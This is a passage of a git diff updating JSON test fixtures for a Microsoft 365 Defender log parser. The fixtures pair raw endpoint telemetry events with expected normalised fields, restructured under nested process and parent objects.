"input": { + "message": "{\"time\":\"2024-11-08T14:42:24.2882642Z\",\"tenantId\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceFileEvents\",\"_TimeReceivedBySvc\":\"2024-11-08T14:41:06.9726687Z\",\"properties\":{\"SHA1\":\"8f6ebe4a51ce4b5f76f4d896a6e289e69f91a264\",\"FileSize\":640920,\"MD5\":\"9a3af3a9ce0217bccce1d161e0b6bfde\",\"FileName\":\"FileName.dll\",\"FolderPath\":\"C:\\\\Program Files\\\\FileName.dll\",\"InitiatingProcessCommandLine\":\"commandexec.exe /V\",\"InitiatingProcessFileName\":\"commandexec.exe\",\"InitiatingProcessParentFileName\":\"services.exe\",\"InitiatingProcessSHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"InitiatingProcessMD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"InitiatingProcessFolderPath\":\"c:\\\\windows\\\\system32\\\\commandexec.exe\",\"InitiatingProcessParentCreationTime\":\"2024-10-09T01:02:27.2227081Z\",\"InitiatingProcessId\":16468,\"DeviceName\":\"device.company.local\",\"DeviceId\":\"123456789abcdef\",\"InitiatingProcessCreationTime\":\"2024-11-08T14:38:23.2383083Z\",\"InitiatingProcessAccountName\":\"syst\u00e8me\",\"InitiatingProcessAccountDomain\":\"account domain\",\"InitiatingProcessAccountSid\":\"S-1-2-3\",\"InitiatingProcessParentId\":888,\"ReportId\":341972,\"SHA256\":\"30204bef93d692fbcbf7475b154e3f65d3aace6f8f030af9e412f3d9e8d9a595\",\"InitiatingProcessIntegrityLevel\":\"System\",\"InitiatingProcessTokenElevation\":\"TokenElevationTypeDefault\",\"FileOriginUrl\":null,\"FileOriginIP\":null,\"FileOriginReferrerUrl\":null,\"AppGuardContainerId\":\"\",\"ActionType\":\"FileCreated\",\"SensitivityLabel\":null,\"SensitivitySubLabel\":null,\"IsAzureInfoProtectionApplied\":null,\"RequestProtocol\":\"Local\",\"ShareName\":null,\"RequestSourceIP\":null,\"RequestSourcePort\":null,\"RequestAccountName\":\"Syst\u00e8me\",\"RequestAccountDomain\":\"ACCOUNT DOMAIN\",\"RequestAccountSid\":\"S-1-2-3\",\"InitiatingProcessSHA256\":\"6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323\",\"InitiatingProcessAccountUpn\":null,\"InitiatingProcessAccountObjectId\":null,\"AdditionalFields\":\"{\\\"FileType\\\":\\\"PortableExecutable\\\"}\",\"PreviousFolderPath\":\"\",\"PreviousFileName\":\"\",\"InitiatingProcessFileSize\":176128,\"InitiatingProcessVersionInfoCompanyName\":\"Microsoft Corporation\",\"InitiatingProcessVersionInfoProductName\":\"Windows Installer - Unicode\",\"InitiatingProcessVersionInfoProductVersion\":\"5.0.22621.3880\",\"InitiatingProcessVersionInfoInternalFileName\":\"commandexec\",\"InitiatingProcessVersionInfoOriginalFileName\":\"commandexec.exe\",\"InitiatingProcessVersionInfoFileDescription\":\"Windows\u00ae installer\",\"InitiatingProcessSessionId\":0,\"IsInitiatingProcessRemoteSession\":false,\"InitiatingProcessRemoteSessionDeviceName\":null,\"InitiatingProcessRemoteSessionIP\":null,\"Timestamp\":\"2024-11-08T14:38:51.9048761Z\",\"MachineGroup\":null},\"Tenant\":\"DefaultTenant\"}", + "sekoiaio": { + "intake": { + "dialect": "Microsoft 365 Defender", + "dialect_uuid": "05e6f36d-cee0-4f06-b575-9e43af779f9f" + } + } + }, + "expected": { + "message": "{\"time\":\"2024-11-08T14:42:24.2882642Z\",\"tenantId\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceFileEvents\",\"_TimeReceivedBySvc\":\"2024-11-08T14:41:06.9726687Z\",\"properties\":{\"SHA1\":\"8f6ebe4a51ce4b5f76f4d896a6e289e69f91a264\",\"FileSize\":640920,\"MD5\":\"9a3af3a9ce0217bccce1d161e0b6bfde\",\"FileName\":\"FileName.dll\",\"FolderPath\":\"C:\\\\Program Files\\\\FileName.dll\",\"InitiatingProcessCommandLine\":\"commandexec.exe /V\",\"InitiatingProcessFileName\":\"commandexec.exe\",\"InitiatingProcessParentFileName\":\"services.exe\",\"InitiatingProcessSHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"InitiatingProcessMD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"InitiatingProcessFolderPath\":\"c:\\\\windows\\\\system32\\\\commandexec.exe\",\"InitiatingProcessParentCreationTime\":\"2024-10-09T01:02:27.2227081Z\",\"InitiatingProcessId\":16468,\"DeviceName\":\"device.company.local\",\"DeviceId\":\"123456789abcdef\",\"InitiatingProcessCreationTime\":\"2024-11-08T14:38:23.2383083Z\",\"InitiatingProcessAccountName\":\"syst\u00e8me\",\"InitiatingProcessAccountDomain\":\"account domain\",\"InitiatingProcessAccountSid\":\"S-1-2-3\",\"InitiatingProcessParentId\":888,\"ReportId\":341972,\"SHA256\":\"30204bef93d692fbcbf7475b154e3f65d3aace6f8f030af9e412f3d9e8d9a595\",\"InitiatingProcessIntegrityLevel\":\"System\",\"InitiatingProcessTokenElevation\":\"TokenElevationTypeDefault\",\"FileOriginUrl\":null,\"FileOriginIP\":null,\"FileOriginReferrerUrl\":null,\"AppGuardContainerId\":\"\",\"ActionType\":\"FileCreated\",\"SensitivityLabel\":null,\"SensitivitySubLabel\":null,\"IsAzureInfoProtectionApplied\":null,\"RequestProtocol\":\"Local\",\"ShareName\":null,\"RequestSourceIP\":null,\"RequestSourcePort\":null,\"RequestAccountName\":\"Syst\u00e8me\",\"RequestAccountDomain\":\"ACCOUNT DOMAIN\",\"RequestAccountSid\":\"S-1-2-3\",\"InitiatingProcessSHA256\":\"6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323\",\"InitiatingProcessAccountUpn\":null,\"InitiatingProcessAccountObjectId\":null,\"AdditionalFields\":\"{\\\"FileType\\\":\\\"PortableExecutable\\\"}\",\"PreviousFolderPath\":\"\",\"PreviousFileName\":\"\",\"InitiatingProcessFileSize\":176128,\"InitiatingProcessVersionInfoCompanyName\":\"Microsoft Corporation\",\"InitiatingProcessVersionInfoProductName\":\"Windows Installer - Unicode\",\"InitiatingProcessVersionInfoProductVersion\":\"5.0.22621.3880\",\"InitiatingProcessVersionInfoInternalFileName\":\"commandexec\",\"InitiatingProcessVersionInfoOriginalFileName\":\"commandexec.exe\",\"InitiatingProcessVersionInfoFileDescription\":\"Windows\u00ae installer\",\"InitiatingProcessSessionId\":0,\"IsInitiatingProcessRemoteSession\":false,\"InitiatingProcessRemoteSessionDeviceName\":null,\"InitiatingProcessRemoteSessionIP\":null,\"Timestamp\":\"2024-11-08T14:38:51.9048761Z\",\"MachineGroup\":null},\"Tenant\":\"DefaultTenant\"}", + "event": { + "category": [ + "file" + ], + "dataset": "device_file_events", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-08T14:38:51.904876Z", + "action": { + "properties": { + "RequestAccountSid": "S-1-2-3", + "process": { + "CommandLine": "commandexec.exe /V", + "FileSize": 176128, + "IntegrityLevel": "System", + "TokenElevation": "TokenElevationTypeDefault", + "VersionInfoCompanyName": "Microsoft Corporation", + "VersionInfoFileDescription": "Windows\u00ae installer", + "VersionInfoInternalFileName": "commandexec", + "VersionInfoOriginalFileName": "commandexec.exe", + "VersionInfoProductName": "Windows Installer - Unicode", + "VersionInfoProductVersion": "5.0.22621.3880" + } + }, + "type": "FileCreated" + }, + "file": { + "directory": "C:\\Program Files\\FileName.dll", + "hash": { + "md5": "9a3af3a9ce0217bccce1d161e0b6bfde", + "sha1": "8f6ebe4a51ce4b5f76f4d896a6e289e69f91a264", + "sha256": "30204bef93d692fbcbf7475b154e3f65d3aace6f8f030af9e412f3d9e8d9a595" + }, + "name": "FileName.dll", + "size": 640920 + }, + "host": { + "id": "123456789abcdef", + "name": "device.company.local" + }, + "microsoft": { + "defender": { + "report": { + "id": "341972" + } + } + }, + "network": { + "protocol": "Local" + }, + "process": { + "args": [ + "/V" + ], + "command_line": "commandexec.exe /V", + "executable": "c:\\windows\\system32\\commandexec.exe", + "hash": { + "md5": "51a9cac9c4e8da44ffd7502be17604ee", + "sha1": "44543e0c6f30415c670c1322e61ca68602d58708", + "sha256": "6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323" + }, + "name": "commandexec.exe", + "parent": { + "name": "services.exe", + "pid": 888, + "start": "2024-10-09T01:02:27.222708Z" + }, + "pid": 16468, + "start": "2024-11-08T14:38:23.238308Z", + "user": { + "domain": "account domain", + "id": "S-1-2-3", + "name": "syst\u00e8me" + }, + "working_directory": "c:\\windows\\system32" + }, + "related": { + "hash": [ + "30204bef93d692fbcbf7475b154e3f65d3aace6f8f030af9e412f3d9e8d9a595", + "44543e0c6f30415c670c1322e61ca68602d58708", + "51a9cac9c4e8da44ffd7502be17604ee", + "6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323", + "8f6ebe4a51ce4b5f76f4d896a6e289e69f91a264", + "9a3af3a9ce0217bccce1d161e0b6bfde" + ], + "user": [ + "Syst\u00e8me" + ] + }, + "user": { + "domain": "ACCOUNT DOMAIN", + "name": "Syst\u00e8me" + } + } +} \ No newline at end of file diff --git a/Microsoft/microsoft-365-defender/tests/test_device_image_load_event.json b/Microsoft/microsoft-365-defender/tests/test_device_image_load_event.json index 497faa7bf..04559806a 100644 --- a/Microsoft/microsoft-365-defender/tests/test_device_image_load_event.json +++ b/Microsoft/microsoft-365-defender/tests/test_device_image_load_event.json @@ -16,10 +16,12 @@ "@timestamp": "2022-09-01T07:47:58.616127Z", "action": { "properties": { - "InitiatingProcessCommandLine": "\"autosync.exe\" /c C:\\PROGRA~2\\adobe\\8.1\\Client\\bin\\fra\\adobe.cfg /c \" usa\"", - "InitiatingProcessFileSize": 66560, - "InitiatingProcessIntegrityLevel": "Medium", - "InitiatingProcessTokenElevation": "TokenElevationTypeDefault" + "process": { + "CommandLine": "\"autosync.exe\" /c C:\\PROGRA~2\\adobe\\8.1\\Client\\bin\\fra\\adobe.cfg /c \" usa\"", + "FileSize": 66560, + "IntegrityLevel": "Medium", + "TokenElevation": "TokenElevationTypeDefault" + } }, "type": "ImageLoaded" }, diff --git a/Microsoft/microsoft-365-defender/tests/test_device_logon_events.json b/Microsoft/microsoft-365-defender/tests/test_device_logon_events.json index 15dc7a41b..e70edf395 100644 --- a/Microsoft/microsoft-365-defender/tests/test_device_logon_events.json +++ b/Microsoft/microsoft-365-defender/tests/test_device_logon_events.json @@ -17,9 +17,11 @@ "action": { "properties": { "AccountSid": "S-1-1-11-1-1", - "InitiatingProcessCommandLine": "WinLogon.exe -SpecialSession", "LogonId": "111111", - "LogonType": "Interactive" + "LogonType": "Interactive", + "process": { + "CommandLine": "WinLogon.exe -SpecialSession" + } }, "type": "LogonSuccess" }, diff --git a/Microsoft/microsoft-365-defender/tests/test_device_network_events.json b/Microsoft/microsoft-365-defender/tests/test_device_network_events.json index 348f76f4e..75ab306b8 100644 --- a/Microsoft/microsoft-365-defender/tests/test_device_network_events.json +++ b/Microsoft/microsoft-365-defender/tests/test_device_network_events.json @@ -16,19 +16,21 @@ "@timestamp": "2023-01-04T14:05:32.314862Z", "action": { "properties": { - "InitiatingProcessAccountObjectId": "e0e5e759-c1e1-4cf9-91d5-c1099ef74614", - "InitiatingProcessCommandLine": "\"EXCEL.EXE\" \"C:\\Users\\USER\\MyDocument.xslx", - "InitiatingProcessFileSize": 63984520, - "InitiatingProcessIntegrityLevel": "Medium", - "InitiatingProcessTokenElevation": "TokenElevationTypeDefault", - "InitiatingProcessVersionInfoCompanyName": "Microsoft Corporation", - "InitiatingProcessVersionInfoFileDescription": "Microsoft Excel", - "InitiatingProcessVersionInfoInternalFileName": "Excel", - "InitiatingProcessVersionInfoOriginalFileName": "Excel.exe", - "InitiatingProcessVersionInfoProductName": "Microsoft Office", - "InitiatingProcessVersionInfoProductVersion": "16.0.15601.20538", "LocalIPType": "Private", - "RemoteIPType": "Public" + "RemoteIPType": "Public", + "process": { + "AccountObjectId": "e0e5e759-c1e1-4cf9-91d5-c1099ef74614", + "CommandLine": "\"EXCEL.EXE\" \"C:\\Users\\USER\\MyDocument.xslx", + "FileSize": 63984520, + "IntegrityLevel": "Medium", + "TokenElevation": "TokenElevationTypeDefault", + "VersionInfoCompanyName": "Microsoft Corporation", + "VersionInfoFileDescription": "Microsoft Excel", + "VersionInfoInternalFileName": "Excel", + "VersionInfoOriginalFileName": "Excel.exe", + "VersionInfoProductName": "Microsoft Office", + "VersionInfoProductVersion": "16.0.15601.20538" + } }, "type": "ConnectionSuccess" }, diff --git a/Microsoft/microsoft-365-defender/tests/test_device_process_created.json b/Microsoft/microsoft-365-defender/tests/test_device_process_created.json index cd2ca7981..7acf31f01 100644 --- a/Microsoft/microsoft-365-defender/tests/test_device_process_created.json +++ b/Microsoft/microsoft-365-defender/tests/test_device_process_created.json @@ -29,9 +29,11 @@ } }, "process": { - "user": { - "domain": "autorite nt", - "name": "syst\u00e8me" + "parent": { + "user": { + "domain": "autorite nt", + "name": "syst\u00e8me" + } } } } diff --git a/Microsoft/microsoft-365-defender/tests/test_device_process_events.json b/Microsoft/microsoft-365-defender/tests/test_device_process_events.json index 7d72e6264..3847a138b 100644 --- a/Microsoft/microsoft-365-defender/tests/test_device_process_events.json +++ b/Microsoft/microsoft-365-defender/tests/test_device_process_events.json @@ -17,25 +17,30 @@ "action": { "properties": { "AccountSid": "S-1-1-11", - "InitiatingProcessCommandLine": "\"MsMpEng.exe\"", - "InitiatingProcessFileSize": 133576, - "InitiatingProcessIntegrityLevel": "System", - "InitiatingProcessLogonId": "999", - "InitiatingProcessTokenElevation": "TokenElevationTypeDefault", - "InitiatingProcessVersionInfoCompanyName": "Microsoft Corporation", - "InitiatingProcessVersionInfoFileDescription": "Antimalware Service Executable", - "InitiatingProcessVersionInfoInternalFileName": "MsMpEng.exe", - "InitiatingProcessVersionInfoOriginalFileName": "MsMpEng.exe", - "InitiatingProcessVersionInfoProductName": "Microsoft\u00ae Windows\u00ae Operating System", - "InitiatingProcessVersionInfoProductVersion": "4.18.2301.6", "LogonId": "999", - "ProcessIntegrityLevel": "System", - "ProcessVersionInfoCompanyName": "Microsoft Corporation", - "ProcessVersionInfoFileDescription": "Microsoft Malware Protection Command Line Utility", - "ProcessVersionInfoInternalFileName": "MpCmdRun", - "ProcessVersionInfoOriginalFileName": "MpCmdRun.exe", - "ProcessVersionInfoProductName": "Microsoft\u00ae Windows\u00ae Operating System", - "ProcessVersionInfoProductVersion": "4.18.2301.6" + "process": { + "IntegrityLevel": "System", + "TokenElevation": "TokenElevationTypeDefault", + "VersionInfoCompanyName": "Microsoft Corporation", + "VersionInfoFileDescription": "Microsoft Malware Protection Command Line Utility", + "VersionInfoInternalFileName": "MpCmdRun", + "VersionInfoOriginalFileName": "MpCmdRun.exe", + "VersionInfoProductName": "Microsoft\u00ae Windows\u00ae Operating System", + "VersionInfoProductVersion": "4.18.2301.6", + "parent": { + "CommandLine": "\"MsMpEng.exe\"", + "FileSize": 133576, + "IntegrityLevel": "System", + "LogonId": "999", + "TokenElevation": "TokenElevationTypeDefault", + "VersionInfoCompanyName": "Microsoft Corporation", + "VersionInfoFileDescription": "Antimalware Service Executable", + "VersionInfoInternalFileName": "MsMpEng.exe", + "VersionInfoOriginalFileName": "MsMpEng.exe", + "VersionInfoProductName": "Microsoft\u00ae Windows\u00ae Operating System", + "VersionInfoProductVersion": "4.18.2301.6" + } + } }, "type": "ProcessCreated" }, @@ -69,31 +74,33 @@ "54", "Scan" ], - "code_signature": { - "status": "Valid", - "subject_name": "OsVendor" - }, "command_line": "\"MpCmdRun.exe\" Scan -ScheduleJob -RestrictPrivileges -DailyScan -ScanTrigger 54", - "executable": "c:\\programdata\\microsoft\\windows defender\\platform\\4.18.2301.6-0\\msmpeng.exe", - "hash": { - "md5": "5d5608654828cf052ba013b3c37cbb61", - "sha1": "5bfbb0f965e2761d75a51faacc9db6a146a7c5ae", - "sha256": "52bd0a4d149f7913b9c3ba111eff1e75188abfcdc54b927390bc3bfad419860e" - }, - "name": "MsMpEng.exe", + "name": "MpCmdRun.exe", "parent": { - "name": "services.exe", - "pid": 1032, - "start": "2023-01-03T08:51:26.740241Z" + "code_signature": { + "status": "Valid", + "subject_name": "OsVendor" + }, + "command_line": "\"MsMpEng.exe\"", + "executable": "c:\\programdata\\microsoft\\windows defender\\platform\\4.18.2301.6-0\\msmpeng.exe", + "hash": { + "md5": "5d5608654828cf052ba013b3c37cbb61", + "sha1": "5bfbb0f965e2761d75a51faacc9db6a146a7c5ae", + "sha256": "52bd0a4d149f7913b9c3ba111eff1e75188abfcdc54b927390bc3bfad419860e" + }, + "name": "MsMpEng.exe", + "pid": 5456, + "start": "2023-01-03T08:51:29.269279Z", + "user": { + "domain": "NT", + "id": "S-1-1-11", + "name": "System" + }, + "working_directory": "c:\\programdata\\microsoft\\windows defender\\platform\\4.18.2301.6-0" }, "pid": 37788, "start": "2023-01-04T14:15:10.355033Z", - "user": { - "domain": "NT", - "id": "S-1-1-11", - "name": "System" - }, - "working_directory": "c:\\programdata\\microsoft\\windows defender\\platform\\4.18.2301.6-0" + "working_directory": "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.2301.6-0" }, "related": { "hash": [ diff --git a/Microsoft/microsoft-365-defender/tests/test_device_process_events_2.json b/Microsoft/microsoft-365-defender/tests/test_device_process_events_2.json index d2e83b32a..cac1e9791 100644 --- a/Microsoft/microsoft-365-defender/tests/test_device_process_events_2.json +++ b/Microsoft/microsoft-365-defender/tests/test_device_process_events_2.json @@ -1,9 +1,15 @@ { "input": { - "message": "{\"time\": \"2024-10-22T15:10:39.1954172Z\", \"tenantId\": \"793abec2-9e48-4d04-b341-59b054c49348\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-DeviceProcessEvents\", \"_TimeReceivedBySvc\": \"2024-10-22T15:10:13.8421815Z\", \"properties\": {\"InitiatingProcessSHA1\": null, \"InitiatingProcessFileSize\": null, \"InitiatingProcessMD5\": null, \"InitiatingProcessFileName\": \"\", \"InitiatingProcessParentFileName\": \"\", \"InitiatingProcessFolderPath\": null, \"InitiatingProcessCommandLine\": \"\", \"SHA1\": \"a94a8fe5ccb19ba61c4c0873d391e987982fbbd3\", \"FileSize\": 144632, \"MD5\": \"098f6bcd4621d373cade4e832627b4f6\", \"FolderPath\": \"/usr/bin/ps\", \"ProcessCommandLine\": \"/bin/ps -A -o comm,pid,pcpu,pmem,rss,etimes --no-headers\", \"FileName\": \"ps\", \"ProcessId\": 423627, \"InitiatingProcessId\": 423627, \"ProcessCreationTime\": \"2024-10-22T15:09:44.594155Z\", \"DeviceName\": \"computer.intranet.example\", \"DeviceId\": \"86dd1cf45142e904cb2e99c2721fac3ca198c6ca\", \"InitiatingProcessCreationTime\": \"2024-10-22T15:09:44.59Z\", \"InitiatingProcessAccountName\": \"root\", \"InitiatingProcessAccountDomain\": \"computer\", \"InitiatingProcessAccountSid\": null, \"InitiatingProcessSignatureStatus\": \"Unknown\", \"InitiatingProcessSignerType\": \"Unknown\", \"InitiatingProcessParentId\": 0, \"ReportId\": 67417, \"InitiatingProcessParentCreationTime\": null, \"InitiatingProcessTokenElevation\": \"None\", \"InitiatingProcessIntegrityLevel\": null, \"AccountDomain\": \"computer\", \"AccountName\": \"root\", \"ProcessTokenElevation\": \"None\", \"ProcessIntegrityLevel\": null, \"AccountSid\": null, \"AppGuardContainerId\": null, \"SHA256\": \"9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08\", \"InitiatingProcessSHA256\": null, \"InitiatingProcessLogonId\": 0, \"LogonId\": 0, \"InitiatingProcessAccountUpn\": null, \"InitiatingProcessAccountObjectId\": null, \"AccountUpn\": null, \"AccountObjectId\": null, \"AdditionalFields\": \"{\\\"InitiatingProcessPosixEffectiveUser\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"InitiatingProcessPosixEffectiveGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591},\\\"InitiatingProcessPosixProcessGroupId\\\":423627,\\\"InitiatingProcessPosixSessionId\\\":180264,\\\"InitiatingProcessCurrentWorkingDirectory\\\":\\\"/opt/microsoft/mdatp/sbin\\\",\\\"InitiatingProcessPosixRealUser\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"ProcessPosixEffectiveUser\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"ProcessPosixEffectiveGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591},\\\"ProcessPosixProcessGroupId\\\":423627,\\\"ProcessPosixSessionId\\\":180264,\\\"ProcessCurrentWorkingDirectory\\\":\\\"/opt/microsoft/mdatp/sbin\\\",\\\"ProcessPosixFilePermissions\\\":[\\\"OthersExecute\\\",\\\"OthersRead\\\",\\\"GroupExecute\\\",\\\"GroupRead\\\",\\\"UserExecute\\\",\\\"UserWrite\\\",\\\"UserRead\\\",\\\"UserAll\\\"],\\\"ProcessPosixFileUserOwner\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"ProcessPosixFileGroupOwner\\\":{\\\"Name\\\":\\\"root\\\",\\\"PosixGroupId\\\":0}}\", \"InitiatingProcessVersionInfoCompanyName\": null, \"InitiatingProcessVersionInfoProductName\": null, \"InitiatingProcessVersionInfoProductVersion\": null, \"InitiatingProcessVersionInfoInternalFileName\": null, \"InitiatingProcessVersionInfoOriginalFileName\": null, \"InitiatingProcessVersionInfoFileDescription\": null, \"ProcessVersionInfoCompanyName\": null, \"ProcessVersionInfoProductName\": null, \"ProcessVersionInfoProductVersion\": null, \"ProcessVersionInfoInternalFileName\": null, \"ProcessVersionInfoOriginalFileName\": null, \"ProcessVersionInfoFileDescription\": null, \"InitiatingProcessSessionId\": null, \"CreatedProcessSessionId\": null, \"IsInitiatingProcessRemoteSession\": false, \"InitiatingProcessRemoteSessionDeviceName\": null, \"InitiatingProcessRemoteSessionIP\": null, \"IsProcessRemoteSession\": false, \"ProcessRemoteSessionDeviceName\": null, \"ProcessRemoteSessionIP\": null, \"ActionType\": \"ProcessCreated\", \"Timestamp\": \"2024-10-22T15:09:44.594155Z\", \"MachineGroup\": \"Linux Servers - remediate threats automatically\"}, \"Tenant\": \"DefaultTenant\"}" + "message": "{\"time\":\"2024-11-08T14:39:36.1544409Z\",\"tenantId\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceProcessEvents\",\"_TimeReceivedBySvc\":\"2024-11-08T14:39:21.6551859Z\",\"properties\":{\"InitiatingProcessSHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"InitiatingProcessFileSize\":145408,\"InitiatingProcessMD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"InitiatingProcessFileName\":\"file.exe\",\"InitiatingProcessParentFileName\":\"file.exe\",\"InitiatingProcessFolderPath\":\"c:\\\\windows\\\\file.exe\",\"InitiatingProcessCommandLine\":\"CommandExec.exe -Embedding ABCDEF0123456789 E Global\\\\HOST0000\",\"SHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"FileSize\":82944,\"MD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"FolderPath\":\"C:\\\\Windows\\\\processcommand.exe\",\"ProcessCommandLine\":\"\\\"processcommand.exe\\\" advfirewall firewall delete rule name=\\\"program=description= embedded HTTP server incoming traffic\\\"\",\"FileName\":\"processcommand.exe\",\"ProcessId\":4520,\"InitiatingProcessId\":10868,\"ProcessCreationTime\":\"2024-11-08T14:38:51.9030484Z\",\"DeviceName\":\"host.group.local\",\"DeviceId\":\"123456789abcdef\",\"InitiatingProcessCreationTime\":\"2024-11-08T14:38:00.6744945Z\",\"InitiatingProcessAccountName\":\"syst\u00e8me\",\"InitiatingProcessAccountDomain\":\"account domain\",\"InitiatingProcessAccountSid\":\"S-1-2-3\",\"InitiatingProcessSignatureStatus\":\"Valid\",\"InitiatingProcessSignerType\":\"OsVendor\",\"InitiatingProcessParentId\":14840,\"ReportId\":17318,\"InitiatingProcessParentCreationTime\":\"2024-11-08T14:37:49.152209Z\",\"InitiatingProcessTokenElevation\":\"TokenElevationTypeDefault\",\"InitiatingProcessIntegrityLevel\":\"System\",\"AccountDomain\":\"account domain\",\"AccountName\":\"syst\u00e8me\",\"ProcessTokenElevation\":\"TokenElevationTypeDefault\",\"ProcessIntegrityLevel\":\"System\",\"AccountSid\":\"S-1-2-3\",\"AppGuardContainerId\":\"\",\"SHA256\":\"6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323\",\"InitiatingProcessSHA256\":\"eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232\",\"InitiatingProcessLogonId\":999,\"LogonId\":999,\"InitiatingProcessAccountUpn\":null,\"InitiatingProcessAccountObjectId\":null,\"AccountUpn\":null,\"AccountObjectId\":null,\"AdditionalFields\":\"{\\\"DesktopName\\\":\\\"Win\\\\\\\\Default\\\"}\",\"InitiatingProcessVersionInfoCompanyName\":\"Microsoft Corporation\",\"InitiatingProcessVersionInfoProductName\":\"Windows Installer - Unicode\",\"InitiatingProcessVersionInfoProductVersion\":\"5.0.22621.3880\",\"InitiatingProcessVersionInfoInternalFileName\":\"file\",\"InitiatingProcessVersionInfoOriginalFileName\":\"file.exe\",\"InitiatingProcessVersionInfoFileDescription\":\"Windows\u00ae installer\",\"ProcessVersionInfoCompanyName\":\"Microsoft Corporation\",\"ProcessVersionInfoProductName\":\"Microsoft\u00ae Windows\u00ae Operating System\",\"ProcessVersionInfoProductVersion\":\"10.0.22621.1\",\"ProcessVersionInfoInternalFileName\":\"processcommand.exe\",\"ProcessVersionInfoOriginalFileName\":\"processcommand.exe\",\"ProcessVersionInfoFileDescription\":\"Network Command Shell\",\"InitiatingProcessSessionId\":0,\"CreatedProcessSessionId\":0,\"IsInitiatingProcessRemoteSession\":false,\"InitiatingProcessRemoteSessionDeviceName\":null,\"InitiatingProcessRemoteSessionIP\":null,\"IsProcessRemoteSession\":false,\"ProcessRemoteSessionDeviceName\":null,\"ProcessRemoteSessionIP\":null,\"ActionType\":\"ProcessCreated\",\"Timestamp\":\"2024-11-08T14:38:51.9073727Z\",\"MachineGroup\":null},\"Tenant\":\"DefaultTenant\"}", + "sekoiaio": { + "intake": { + "dialect": "Microsoft 365 Defender", + "dialect_uuid": "05e6f36d-cee0-4f06-b575-9e43af779f9f" + } + } }, "expected": { - "message": "{\"time\": \"2024-10-22T15:10:39.1954172Z\", \"tenantId\": \"793abec2-9e48-4d04-b341-59b054c49348\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-DeviceProcessEvents\", \"_TimeReceivedBySvc\": \"2024-10-22T15:10:13.8421815Z\", \"properties\": {\"InitiatingProcessSHA1\": null, \"InitiatingProcessFileSize\": null, \"InitiatingProcessMD5\": null, \"InitiatingProcessFileName\": \"\", \"InitiatingProcessParentFileName\": \"\", \"InitiatingProcessFolderPath\": null, \"InitiatingProcessCommandLine\": \"\", \"SHA1\": \"a94a8fe5ccb19ba61c4c0873d391e987982fbbd3\", \"FileSize\": 144632, \"MD5\": \"098f6bcd4621d373cade4e832627b4f6\", \"FolderPath\": \"/usr/bin/ps\", \"ProcessCommandLine\": \"/bin/ps -A -o comm,pid,pcpu,pmem,rss,etimes --no-headers\", \"FileName\": \"ps\", \"ProcessId\": 423627, \"InitiatingProcessId\": 423627, \"ProcessCreationTime\": \"2024-10-22T15:09:44.594155Z\", \"DeviceName\": \"computer.intranet.example\", \"DeviceId\": \"86dd1cf45142e904cb2e99c2721fac3ca198c6ca\", \"InitiatingProcessCreationTime\": \"2024-10-22T15:09:44.59Z\", \"InitiatingProcessAccountName\": \"root\", \"InitiatingProcessAccountDomain\": \"computer\", \"InitiatingProcessAccountSid\": null, \"InitiatingProcessSignatureStatus\": \"Unknown\", \"InitiatingProcessSignerType\": \"Unknown\", \"InitiatingProcessParentId\": 0, \"ReportId\": 67417, \"InitiatingProcessParentCreationTime\": null, \"InitiatingProcessTokenElevation\": \"None\", \"InitiatingProcessIntegrityLevel\": null, \"AccountDomain\": \"computer\", \"AccountName\": \"root\", \"ProcessTokenElevation\": \"None\", \"ProcessIntegrityLevel\": null, \"AccountSid\": null, \"AppGuardContainerId\": null, \"SHA256\": \"9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08\", \"InitiatingProcessSHA256\": null, \"InitiatingProcessLogonId\": 0, \"LogonId\": 0, \"InitiatingProcessAccountUpn\": null, 